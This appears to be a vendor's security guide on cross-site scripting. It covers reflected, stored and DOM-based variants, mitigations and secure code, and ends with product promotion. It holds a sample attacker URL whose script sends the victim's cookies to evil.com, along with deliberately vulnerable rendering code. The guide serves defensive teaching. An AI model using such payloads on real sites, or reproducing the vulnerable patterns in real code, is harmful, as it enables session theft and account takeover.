Cross-Site Scripting (XSS)

Verified by Precogs Threat Research
Security GuideA05:2025

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a client-side code injection attack where an attacker injects malicious scripts into web pages viewed by other users. The victim's browser executes the malicious script because it comes from a trusted source.

How Does XSS Work?

There are three types: Reflected XSS (malicious script is reflected from the server in the response), Stored XSS (the script is permanently stored on the target server), and DOM-based XSS (the vulnerability exists in client-side JavaScript). All exploit the browser's trust in the website's content.

Reflected XSS

The attacker crafts a URL containing a malicious script and tricks the victim into clicking it. The server reflects the script back in the HTTP response, and the victim's browser executes it.

<!-- Vulnerable search result page -->
<p>Search results for: <?= $_GET['query'] ?></p>

<!-- Attacker URL: /search?query=<script>document.location='https://evil.com/steal?c='+document.cookie</script> -->

Stored XSS

The malicious script is permanently stored on the target server (in a database, message forum, comment field). Every user who views the page executes the script.

// Vulnerable comment rendering
app.get('/comments', (req, res) => {
  const comments = db.getComments();
  // DANGEROUS: rendering raw HTML from user input
  res.send(comments.map(c => `<div>${c.body}</div>`).join(''));
});

DOM-Based XSS

The vulnerability exists entirely in client-side JavaScript. The malicious payload never touches the server.

// Vulnerable DOM manipulation
const hash = window.location.hash.substring(1);
document.getElementById('output').innerHTML = hash; // XSS via URL fragment

Real-World Examples

The 2018 British Airways breach used a Magecart XSS attack to steal 380,000 payment cards. The 2010 Twitter XSS worm spread to 500,000+ accounts in hours. Stored XSS in customer support portals regularly leads to admin account takeover.

Security Impact

XSS enables session hijacking, credential theft, keylogging, phishing, website defacement, and malware distribution. In single-page applications, XSS can compromise entire user sessions and access tokens.

Prevention & Mitigation

Apply context-appropriate output encoding (HTML, JavaScript, URL, CSS contexts). Use Content Security Policy (CSP) headers. Validate and sanitize input on the server side. Use HttpOnly and Secure flags on cookies.

Secure Code Example

// SECURE: Using textContent instead of innerHTML
document.getElementById('output').textContent = userInput;

// SECURE: React auto-escapes by default
function Comment({ body }) {
  return <p>{body}</p>; // Safe — React escapes HTML entities
}

// SECURE: Content Security Policy header
// Content-Security-Policy: default-src 'self'; script-src 'self'

How Precogs AI Stops Cross-Site Scripting (XSS)

Precogs AI identifies XSS vulnerabilities in AI-generated frontend code through pre-LLM filters, detecting unsanitized output rendering and missing encoding in React, Vue, and Angular applications.

Related CWE Entries

Related Resources

🔍 Related CWE Entries

🔗 External References

Quick Facts

TypeSecurity Guide
CWEs2
OWASPA05:2025

Quick Links

Protect Against Cross-Site Scripting (XSS)

Precogs AI continuously detects cross-site scripting (xss) across your codebase, binaries, and firmware.

Start Free Scan